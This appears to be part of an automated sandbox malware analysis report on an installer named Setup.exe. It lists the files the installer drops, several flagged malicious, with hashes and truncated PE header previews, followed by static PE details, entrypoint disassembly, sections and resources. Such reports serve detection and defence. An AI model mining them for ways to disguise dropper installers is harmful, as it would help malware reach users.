                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                                            • Filename: qnUFsmyxMm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                                                                                            Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                                                            MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                                                            SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                                                            SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                                                                                            Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                                                            MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                                                            SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                                                            SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):846325235
                                                                                                                                                                                                                                                            Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                                                            SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                                                            SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\ColorStreamLib\is-7IJ4L.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):846325235
                                                                                                                                                                                                                                                            Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                                                            SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                                                            SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Entropy (8bit):6.867571479419124
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                                                                                                                                            • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                                                                                                                            • Inno Setup installer (109748/4) 1.07%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                            File name:Setup.exe
                                                                                                                                                                                                                                                            File size:1'543'377 bytes
                                                                                                                                                                                                                                                            MD5:f24fcf422c2611892a30adf91d85f556
                                                                                                                                                                                                                                                            SHA1:87d13ac981079a41cbaa7df94d82d4818bf49444
                                                                                                                                                                                                                                                            SHA256:3ec2c8a5d04cb1407b981cecd39f2d95f99cfa7e76d4a31f81f23b430feb4da5
                                                                                                                                                                                                                                                            SHA512:4e2a725099d331ca9a48510093ca2f85b8d370a65ceb84cfd87cd5f85dc14e12765acc113cc2cba457c739350c4b35beae4ff7adb56597358f17b164ba42ad2b
                                                                                                                                                                                                                                                            SSDEEP:24576:XnbbPImgK4brDi4IxWRqzwqNb+Yz73P2EMZbG0JEtdqxytMDa/4wtoDfTgmG:3HeKh4BqzF3PYdStoXDagVU
                                                                                                                                                                                                                                                            TLSH:97657D22A7E58037D5B32F754E37D2959C757D212EB4D44A3EB88E0C0E79B80AE35392
                                                                                                                                                                                                                                                            File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                                            Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Entrypoint:0x5025d8
                                                                                                                                                                                                                                                            Entrypoint Section:.itext
                                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                            Time Stamp:0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                            Import Hash:f62b90e31eca404f228fcf7068b00f31

                                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                                            add esp, FFFFFFF0h
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                                            mov eax, 00500930h
                                                                                                                                                                                                                                                            call 00007FD71CE4A1A6h
                                                                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov ebx, dword ptr [eax+00000170h]
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            call 00007FD71CE4B051h
                                                                                                                                                                                                                                                            and eax, FFFFFF7Fh
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            call 00007FD71CE4B2A6h
                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            push 00502653h
                                                                                                                                                                                                                                                            push dword ptr fs:[eax]
                                                                                                                                                                                                                                                            mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                                                            push 00000001h
                                                                                                                                                                                                                                                            call 00007FD71CE4A9F1h
                                                                                                                                                                                                                                                            call 00007FD71CF4188Ch
                                                                                                                                                                                                                                                            mov eax, dword ptr [00500568h]
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            push 005005CCh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            call 00007FD71CEBD67Dh
                                                                                                                                                                                                                                                            call 00007FD71CF418E0h
                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            mov dword ptr fs:[eax], edx
                                                                                                                                                                                                                                                            jmp 00007FD71CF4385Bh
                                                                                                                                                                                                                                                            jmp 00007FD71CE458CDh
                                                                                                                                                                                                                                                            call 00007FD71CF4165Ch
                                                                                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                                                                                            call 00007FD71CE4638Eh
                                                                                                                                                                                                                                                            call 00007FD71CE45D11h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov edx, 005027E8h
                                                                                                                                                                                                                                                            call 00007FD71CEBD188h
                                                                                                                                                                                                                                                            push 00000005h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax+00000170h]
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            call 00007FD71CE4B267h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov edx, dword ptr [004DACA0h]

                                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x10e0000x3840.idata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1140000x6ac00.rsrc
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x1130000x18.rdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10ea800x88c.idata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                            .text0x10000xffdc80xffe003519a31224f088b9e2b9951985b3e485False0.48290276166340984data6.485132585729415IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .itext0x1010000x17f40x18008e0d52126a75001416d71c23878be2c1False0.5244140625data6.003729381717893IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .data0x1030000x308c0x3200c2acc8e96fc244753abd1d87bb624bc0False0.425078125data4.3575606000501415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .bss0x1070000x61980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .idata0x10e0000x38400x3a000e1e8128f777a5ff18a144305a4fb39cFalse0.3108836206896552data5.2048781278956655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .tls0x1120000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .rdata0x1130000x180x2009cf98ea6bb17a35d99fa770a2e9a8ff0False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .rsrc0x1140000x6ac000x6ac00a6972768feabccd18590b0645ee0551fFalse0.578031231703747data7.370221623166918IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                            RT_CURSOR0x114c440x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                                                            RT_CURSOR0x114d780x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                                                                            RT_CURSOR0x114eac0x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                                                                            RT_CURSOR0x114fe00x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                                                                            RT_CURSOR0x1151140x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                                                                            RT_CURSOR0x1152480x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                                                                            RT_CURSOR0x11537c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                                                            RT_BITMAP0x1154b00x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                                                                                                                                                                                                                                                            RT_BITMAP0x1159980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                                                                                                                                                                                            RT_ICON0x115a800x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                                                                                                                                                                                                            RT_ICON0x115ba80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                                                                                                                                                                                                            RT_ICON0x1161100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                                                                                                                                                                                                            RT_ICON0x1163f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                                                                                                                                                                                                            RT_STRING0x116ca00xecdata0.6059322033898306
                                                                                                                                                                                                                                                            RT_STRING0x116d8c0x250data0.47466216216216217
                                                                                                                                                                                                                                                            RT_STRING0x116fdc0x28cdata0.4647239263803681
                                                                                                                                                                                                                                                            RT_STRING0x1172680x3e4data0.4347389558232932
                                                                                                                                                                                                                                                            RT_STRING0x11764c0x9cdata0.717948717948718
                                                                                                                                                                                                                                                            RT_STRING0x1176e80xe8data0.6293103448275862
                                                                                                                                                                                                                                                            RT_STRING0x1177d00x468data0.3820921985815603
                                                                                                                                                                                                                                                            RT_STRING0x117c380x38cdata0.3898678414096916
